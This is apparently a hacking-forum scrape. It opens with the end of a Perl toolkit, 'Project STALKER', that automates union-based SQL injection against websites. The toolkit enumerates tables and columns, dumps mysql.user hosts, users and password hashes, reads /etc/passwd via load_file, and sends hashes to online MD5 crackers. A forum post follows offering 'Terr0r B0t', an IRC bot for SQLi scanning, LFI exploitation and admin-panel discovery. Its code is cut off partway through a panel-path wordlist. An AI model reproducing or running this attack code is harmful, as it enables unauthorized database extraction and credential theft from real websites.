    if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
    my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
    my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
    unless ($testar1 eq $testar2) {
    my $patha = $1;
    chomp $patha;
    $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
    $total = "1";
    for my $rows(2..200) {
    $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
    $total.= ",".$rows;
    $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
    $test = toma($injection);
    if ($test=~/RATSXPDOWN/) {
    @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
    $control = 1;
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;
    savefile($save.".txt","\n[Target confirmed] : $page");
    savefile($save.".txt","[Bypass] : $_[1]\n");
    savefile($save.".txt","[Limit] : The site has $rows columns");
    savefile($save.".txt","[Data] : The number @number print data");
    if ($patha) {
    savefile($save.".txt","[Full Path Discloure] : $patha");
    }
    $total=~s/$number[0]/hackman/;
    savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
    return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
    }}}}}


    sub details {
    my ($page,$bypass,$save) = @_;
    ($pass1,$pass2) = &bypass($bypass);
    savefile($save.".txt","\n");
    if ($page=~/(.*)hackman(.*)/ig) {
    print "\n\n[+] Searching information..\n\n";
    my  ($start,$end) = ($1,$2);
    $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
    $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
    $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    $test1 = toma($inforschema);
    $test2 = toma($mysqluser);
    if ($test2=~/ERTOR854/ig) {
    savefile($save.".txt","[mysql.user] : ON");
    print "[mysql.user] : ON\n";
    } else {
    print "[mysql.user] : OFF\n";
    savefile($save.".txt","[mysql.user] : OFF");
    }
    if ($test1=~/ERTOR854/ig) {
    print "[information_schema.tables] : ON\n";
    savefile($save.".txt","[information_schema.tables] : ON");
    } else {
    print "[information_schema.tables] : OFF\n";
    savefile($save.".txt","[information_schema.tables] : OFF");
    }
    if ($test3=~/ERTOR854/ig) {
    print "[+] load_file permite ver los archivos\n";
    savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    }
    $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
    $injection = $start.$concat.$end.$pass2;
    $code = toma($injection);
    if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
    print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
    savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
    } else {
    print "\n[-] Not found any data\n";
    }}}


    sub menu_options {

    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;
    print "\n/logs/webs/$save>";
    chomp (my $rta = <stdin>);

    if ($rta=~/help/) {
    print qq(

    commands : details tables columns dbs othertable othercolumn
              mysqluser dumper logs exit

    );
    }


    if ($rta =~/tables/) {
    schematables($_[0],$_[1],$save);
    &reload;
    }
    elsif ($rta =~/columns (.*)/) {
    my $tabla = $1;
    schemacolumns($_[0],$_[1],$save,$tabla);
    &reload;
    }
    elsif ($rta =~/dbs/) {
    &schemadb($_[0],$_[1],$save);
    &reload;
    }
    elsif ($rta =~/othertable (.*)/) {
    my $data = $1;
    &schematablesdb($_[0],$_[1],$data,$save);
    &reload;
    }
    elsif ($rta =~/othercolumn (.*) (.*)/){
    my ($db,$table) = ($1,$2);
    &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
    &reload;
    }
    elsif ($rta =~/mysqluser/) {
    &mysqluser($_[0],$_[1],$save);
    &reload;
    }
    elsif ($rta=~/logs/) {
    $t = "logs/webs/$save.txt";
    system("start $t");
    &reload;
    }
    elsif ($rta=~/exit/) {
    next;
    }

    elsif ($rta=~/dumper (.*) (.*) (.*)/) {
    my ($tabla,$col1,$col2) = ($1,$2,$3);
    &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
    &reload;
    }
    elsif ($rta =~/details/) {
    &details($_[0],$_[1],$save);
    &reload;
    }
    else {
    &reload;
    }
    }



    sub schematables {
    $real = "1";
    my ($page,$bypass,$save) = @_;
    savefile($save.".txt","\n");
    print "\n";
    my $page1 = $page;
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($save.".txt","[DB] : default");
    print "\n[+] Searching tables with schema\n\n";
    $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $resto = $1;
    $total = $resto - 17;
    print "[+] Tables Length :  $total\n\n";
    savefile($save.".txt","[+] Searching tables with schema\n");
    savefile($save.".txt","[+] Tables Length :  $total\n");
    my $limit = $1;
    for my $limit(17..$limit) {
    $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $table = $1;
    chomp $table;
    print "[Table $real Found : $table ]\n";
    savefile($save.".txt","[Table $real Found : $table ]");
    $real++;
    }}
    print "\n";
    } else {
    print "\n[-] information_schema = ERROR\n";
    }
    }

    sub reload {
    &menu_options($_[0]);
    }


    sub schemacolumns {
    my ($page,$bypass,$save,$table) = @_;
    my $page3 = $page;
    my $page4 = $page;
    savefile($save.".txt","\n");
    print "\n";
    ($pass1,$pass2) = &bypass($bypass);
    print "\n[DB] : default\n";
    savefile($save.".txt","[DB] : default");
    savefile($save.".txt","[Table] : $table\n");
    $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
    if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n[Columns Length : $1 ]\n\n";
    savefile($save.".txt","[Columns Length : $1 ]\n");
    my $si = $1;
    chomp $si;
    $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit2(0..$si) {
    $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
    if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "[Column $real] : $1\n";
    savefile($save.".txt","[Column $real] : $1");
    $real++;
    }}
    print "\n";
    } else {
    print "\n[-] information_schema = ERROR\n";
    }}

    sub schemadb {
    my ($page,$bypass,$save) = @_;
    my $page1 = $page;
    savefile($save.".txt","\n");
    print "\n\n[+] Searching DBS\n\n";
    ($pass1,$pass2) = &bypass($bypass);
    $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $limita = $1;
    print "[+] Databases Length : $limita\n\n";
    savefile($save.".txt","[+] Databases Length : $limita\n");
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit(0..$limita) {
    $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $control = $1;
    if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
    print "[Database $real Found] $control\n";
    savefile($save.".txt","[Database $real Found] : $control");
    $real++;
    }
    }
    }
    print "\n";
    } else {
    print "[-] information_schema = ERROR\n";
    }
    }

    sub schematablesdb {
    my $page = $_[0];
    my $db = $_[2];
    my $page1 = $page;
    savefile($_[3].".txt","\n");
    print "\n\n[+] Searching tables with DB $db\n\n";
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($_[3].".txt","[DB] : $db");
    $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
    #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
    print "[+] Tables Length :  $1\n\n";
    savefile($_[3].".txt","[+] Tables Length :  $1\n");
    my $limit = $1;
    $real = "1";
    for my $lim(0..$limit) {
    $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
    #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
    if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $table = $1;
    chomp $table;
    savefile($_[3].".txt","[Table $real Found : $table ]");
    print "[Table $real Found : $table ]\n";
    $real++;
    }}
    print "\n";
    } else {
    print "\n[-] information_schema = ERROR\n";
    }}

    sub schemacolumnsdb {
    my ($page,$bypass,$db,$table,$save) = @_;
    my $page3 = $page;
    my $page4 = $page;
    print "\n\n[+] Searching columns in table $table with DB $db\n\n";
    savefile($save.".txt","\n");
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($save.".txt","\n[DB] : $db");
    savefile($save.".txt","[Table] : $table");
    $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
    if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n[Columns length : $1 ]\n\n";
    savefile($save.".txt","[Columns length : $1 ]\n");
    my $si = $1;
    chomp $si;
    $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit2(0..$si) {
    $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
    if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "[Column $real] : $1\n";
    savefile($save.".txt","[Column $real] : $1");
    $real++;
    }
    }
    } else {
    print "\n[-] information_schema = ERROR\n";
    }
    print "\n";
    }

    sub mysqluser {
    my ($page,$bypass,$save) = @_;
    my $cop = $page;
    my $cop1 = $page;
    savefile($save.".txt","\n");
    print "\n\n[+] Finding mysql.users\n";
    ($pass1,$pass2) = &bypass($bypass);
    $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
    $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
    if ($code=~/RATSXPDOWN/ig){
    $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
    if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n[+] Users Found : $1\n\n";
    savefile($save.".txt","\n[+] Users mysql Found : $1\n");
    for my $limit(0..$1) {
    $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
    $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
    print "[Host] : $1 [User] : $2 [Password] : $3\n";
    savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
    } else {
    print "\n";
    &reload;
    }
    }
    }
    } else {
    print "\n[-] mysql.user = ERROR\n\n";
    }
    }

    sub dump {
    savefile($_[5].".txt","\n");
    my $page = $_[0];
    ($pass1,$pass2) = &bypass($_[4]);
    if ($page=~/(.*)hackman(.*)/){
    my $start = $1;
    my $end = $2;
    print "\n\n[+] Extracting values...\n\n";
    $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
    $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
    $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
    if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
    $tota = $1;
    print "[+] Table : $_[3]\n";
    print "[+] Length of the rows : $tota\n\n";
    print "[$_[1]] [$_[2]]\n\n";
    savefile($_[5].".txt","[Table] : $_[3]");
    savefile($_[5].".txt","[+] Length of the rows: $tota\n");
    savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
    for my $limit(0..$tota) {
    chomp $limit;
    $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
    savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
    print "[$_[1]] : $1   [$_[2]] : $2\n";
    } else {
    print "\n\n[+] Extracting Finish\n\n";
    &reload;
    }
    }
    } else {
    print "[-] Not Found any DATA\n\n";
    }}}

    sub bypass {
    if ($_[0] eq "/*") { return ("/**/","/*"); }
    elsif ($_[0] eq "%20") { return ("%20","%00"); }
    else {return ("+","--");}}

    sub ascii {
    return join ',',unpack "U*",$_[0];
    }

    sub base {
    $re = encode_base64($_[0]);
    chomp $re;
    return $re;
    }

    sub base_de {
    $re = decode_base64($_[0]);
    chomp $re;
    return $re;
    }


    sub download {
    if ($nave->mirror($_[0],$_[1])) {
    if (-f $_[1]) {
    return true;
    }}}


    sub hex_en {
    my $string = $_[0];
    $hex = '0x';
    for (split //,$string) {
    $hex .= sprintf "%x", ord;
    }
    return $hex;
    }

    sub hex_de {
    my $text = shift;
    $text =~ s/^0x//;
    $encode = join q[], map { chr hex } $text =~ /../g;
    return $encode;
    }

    sub ascii_de {
    my $text = shift;
    $text = join q[], map { chr } split q[,],$text;
    return $text;
    }

    sub getprocess {

    my %procesos;

    my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
    my $dos = $uno->ConnectServer("","root\\cimv2");

    foreach my $pro (in $dos->InstancesOf("Win32_Process")){
    $procesos{$pro->{Caption}} = $pro->{ProcessId};
    }
    return %procesos;
    }

    sub killprocess {

    my ($numb,$pid) = @_;

    if (Win32::Process::KillProcess($pid,$numb)) {
    return true;
    } else {
    return false;
    }
    }

    sub getip {
    my $get = gethostbyname($_[0]);
    return inet_ntoa($get);
    }

    sub crackit {

    my $secret = $_[0];

    print "[+] Cracking $_[0]\n\n";

    my %hash = (
     
    'http://passcracking.com/' => {
    'tipo'  => 'post',
    'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
    'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
    },  
    'http://md5.hashcracking.com/search.php?md5=' =>  {
    'tipo' => 'get',
    'regex' => 'Cleartext of $_[0] is (.*)',
    },
    'http://www.bigtrapeze.com/md5/' =>  {
    'tipo' => 'post',
    'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
    'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
    },
    'http://opencrack.hashkiller.com/' =>  {
    'tipo' => 'post',
    'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
    'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
    },
    'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
    'tipo' => 'post',
    'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
    'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
    },
    'http://victorov.su/md5/?md5e=&md5d=' =>  {
    'tipo' => 'get',
    'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
    }
    );

    for my $data(keys %hash) {

    if ($hash{$data}{tipo} eq "get") {
    $code = toma($data.$_[0]);
    if ($code=~/$hash{$data}{regex}/ig) {
    print "\n[+] Decoded : ".$1."\n\n";
    saveyes("logs/pass-found.txt",$secret.":".$1);
    }
    } else {
    $code = tomar($data,$hash{$data}{variables});
    if ($code=~/$hash{$data}{regex}/ig) {
    saveyes("logs/pass-found.txt",$secret.":".$1);
    }
    }
    }
    print "\n[+] Finish\n";
    }

    sub ftp {

    my ($ftp,$user,$pass) = @_;

    if (my $socket = Net::FTP->new($ftp)) {
    if ($socket->login($user,$pass)) {

    print "\n[+] Enter of the server FTP\n\n";

    menu:

    print "\n\nftp>";
    chomp (my $cmd = <stdin>);
    print "\n\n";

    if ($cmd=~/help/) {
    print q(

    help : show information
    cd : change directory <dir>
    dir : list a directory
    mkdir : create a directory <dir>
    rmdir : delete a directory <dir>
    pwd : show the current directory
    del : delete a file <file>
    rename : rename a file <file1> <file2>
    size : size of a file <file>
    put : upload a file <file>
    get : download a file <file>
    cdup : go to the parent directory
    exit : leave the ftp prompt


    );
    }

    if ($cmd=~/dir/ig) {
    if (my @files = $socket->dir()) {
    for(@files) {
    print "[+] ".$_."\n";
    }
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/pwd/ig) {
    print "[+] Path : ".$socket->pwd()."\n";
    }

    if ($cmd=~/cd (.*)/ig) {
    if ($socket->cwd($1)) {
    print "[+] Directory changed\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/cdup/ig) {
    if (my $dir = $socket->cdup()) {
    print "\n\n[+] Directory changed\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/del (.*)/ig) {
    if ($socket->delete($1)) {
    print "[+] File deleted\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/rename (.*) (.*)/ig) {
    if ($socket->rename($1,$2)) {
    print "[+] File Updated\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/mkdir (.*)/ig) {
    if ($socket->mkdir($1)) {
    print "\n\n[+] Directory created\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/rmdir (.*)/ig) {
    if ($socket->rmdir($1)) {
    print "\n\n[+] Directory deleted\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/exit/ig) {
    next;
    }

    if ($cmd=~/get (.*) (.*)/ig) {
    print "\n\n[+] Downloading file\n\n";
    if ($socket->get($1,$2)) {
    print "[+] Download completed";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/put (.*) (.*)/ig) {
    print "\n\n[+] Uploading file\n\n";
    if ($socket->put($1,$2)) {
    print "[+] Upload completed";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/quit/) {
    next;
    }

    goto menu;

    } else {
    print "\n[-] Failed the login\n\n";
    }

    } else {
    print "\n\n[-] Error\n\n";
    }



    }


    sub scanpaths {

    my $urla = $_[0];

    print "\n[+] Find paths in $urla\n\n\n";
    my @urls = repes(get_links(toma($urla)));
    for $url(@urls) {
    my $web = $url;
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
    if ($_[0] =~/$auth/ or $auth eq "") {
    if ($path=~/(.*)\/(.*)\.(.*)$/) {
    my $borrar = $2.".".$3;
    if ($web=~/(.*)$borrar/) {
    my $co = $1;
    unless ($co=~/$auth/) {
    $co = $urla.$co;
    }
    $code = toma($co);
    if ($code=~/Index Of/ig) {
    print "[Link] : ".$co."\n";
    saveyes("logs/paths-found.txt",$co);
    }}}}}
    print "\n\n[+] Finish\n";
    }


    sub scanport {

    my %ports = ("21"=>"ftp",
    "22"=>"ssh",
    "25"=>"smtp",
    "80"=>"http",
    "110"=>"pop3",
    "3306"=>"mysql"
    );


    print "[+] Scanning $_[0]\n\n\n";

    for my $port(keys %ports) {

    if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
    print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
    }
    }
    print "\n\n[+] Finish\n";
    }


    sub scanpanel {
    print "[+] Scanning $_[0]\n\n\n";
    for $path(@panels) {
    $code = tomax($_[0]."/".$path);
    if ($code->is_success) {
    print "[Link] : ".$_[0]."/".$path."\n";
    saveyes("logs/panel-logs.txt",$_[0]."/".$path);
    }
    }
    print "\n\n[+] Finish\n";
    }

    sub google {
    my($a,$b) = @_;
    for ($pages=10;$pages<=$b;$pages=$pages+10) {
    $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
    my @links = get_links($code);
    for my $l(@links) {
    if ($l =~/webcache.googleusercontent.com/) {
    push(@url,$l);
    }
    }
    }

    for(@url) {
    if ($_ =~/cache:(.*?):(.*?)\+/) {
    push(@founds,$2);
    }
    }

    my @founds = repes(@founds);

    return @founds;
    }


    sub sql {

    my ($pass1,$pass2) = ("+","--");
    my $page = shift;
    $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
    if ($code1=~/The used SELECT statements have a different number of columns/ig) {
    print "[+] SQLI : $page\a\n";
    saveyes("logs/sql-logs.txt",$page);
    }}

    sub get_links {

    my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
    return @links;

    sub agarrar {
    my ($a,%b) = @_;
    push(@links,values %b);
    }

    }

    sub repes {
    foreach $test(@_) {
    push @limpio,$test unless $repe{$test}++;
    }
    return @limpio;
    }

    sub head {
    cprint "\x0311"; #13
    print "\n\n-- == Project STALKER == --\n\n";
    cprint "\x030";
    }

    sub copyright {
    cprint "\x0311"; #13
    print"\n\n(C) Doddy Hackman 2011\n\n";
    cprint "\x030";
    }

    sub toma {
    return $nave->get($_[0])->content;
    }

    sub tomax {
    return $nave->get($_[0]);
    }

    sub tomar {
    my ($web,$var) = @_;
    return $nave->post($web,[%{$var}])->content;
    }


    sub conectar {

    my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
    Proto => "tcp",Timeout  => 5);

    print $sockex $_[2]."\r\n";
    $sockex->read($re,5000);
    $sockex->close;
    return $re."\r\n";
    }


    sub enter {

    my ($host,$user,$pass) = @_;

    print "[+] Connecting to the server\n";

    $info = "dbi:mysql::".$host.":3306";
    if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {

    print "\n[+] Enter in the database";

    while(1) {
    print "\n\n\n[+] Query : ";
    chomp(my $ac = <stdin>);

    if ($ac eq "exit") {
    $enter->disconnect;
    print "\n\n[+] Closing connection\n\n";
    last;
    }

    $re = $enter->prepare($ac);
    $re->execute();
    my $total = $re->rows();

    my @columnas = @{$re->{NAME}};

    if ($total eq "-1") {
    print "\n\n[-] Query Error\n";
    next;
    } else {
    print "\n\n[+] Result of the query\n";
    if ($total eq 0) {
    print "\n\n[+] Not rows returned\n\n";
    } else {
    print "\n\n[+] Rows returned : ".$total."\n\n\n";
    for(@columnas) {
    print $_."\t\t";
    }
    print "\n\n";
    while (@row = $re->fetchrow_array) {
    for(@row) {
    print $_."\t\t";
    }
    print "\n";
    }}}}
    } else {
    print "\n[-] Error connecting\n";
    }}

    sub saveyes {
    open (SAVE,">>".$_[0]);
    print SAVE $_[1]."\n";
    close SAVE;
    }

    sub savefile {
    open (SAVE,">>logs/webs/".$_[0]);
    print SAVE $_[1]."\n";
    close SAVE;
    }

    sub coleccionar {
    opendir DIR,$_[0];
    my @archivos = readdir DIR;
    close DIR;
    return @archivos;
    }

    sub helpme {

    cprint "\x0310"; #13
    print qq(

    Commands :


    getinfo
    getip <host>
    getlink <page>
    getprocess
    killprocess <name process> <pid process>
    conec <host> <port> <command>  
    allow <host>
    paths <page>
    encodehex <text>
    decodehex <text>
    encodeascii <text>
    decodeascii <text>
    encodebase <text>
    decodebase <text>
    scanport <host>
    panel <page>
    getpass <hash>
    kobra <page>
    ftp <host> <user> <pass>
    mysql <host> <user> <pass>
    navegator
    scangoogle
    help
    exit

    );
    cprint "\x030";
    }

    #
    #  The End ?
    #
#391
Scripting / [Perl] Terr0r B0t By Doddy H
7 October 2011, 15:55 PM
Hello everyone.

Today I bring you a program I made last night. It is an IRC bot with
the following options:

* Base64, hex and ASCII encoding and decoding
* Search for a site's administration panel
* SQLi scan (finds the number of columns and gives info)
* Tool to exploit LFI

Commands for the bot in the channel


!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='


Usage:


C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl


[+] tERR0R b0T (c) dODDy HacKMaN 2010

[+] Starting the bot
[+] Online




Code (perl)
#!/usr/bin/perl
#Terr0r B0t (C) Doddy Hackman 2010
#Commands to use
#
#!base64 encode/decode string
#!hex encode/decode string
#!ascii encode/decode string
#!panel http://127.0.0.1
#!sqli http://127.0.0.1/sql.php?id=
#!lfi http://127.0.0.1/lfi.php?file='
#
#





use IO::Socket;
use LWP::UserAgent;
use HTTP::Request::Common;



@dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');


@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.p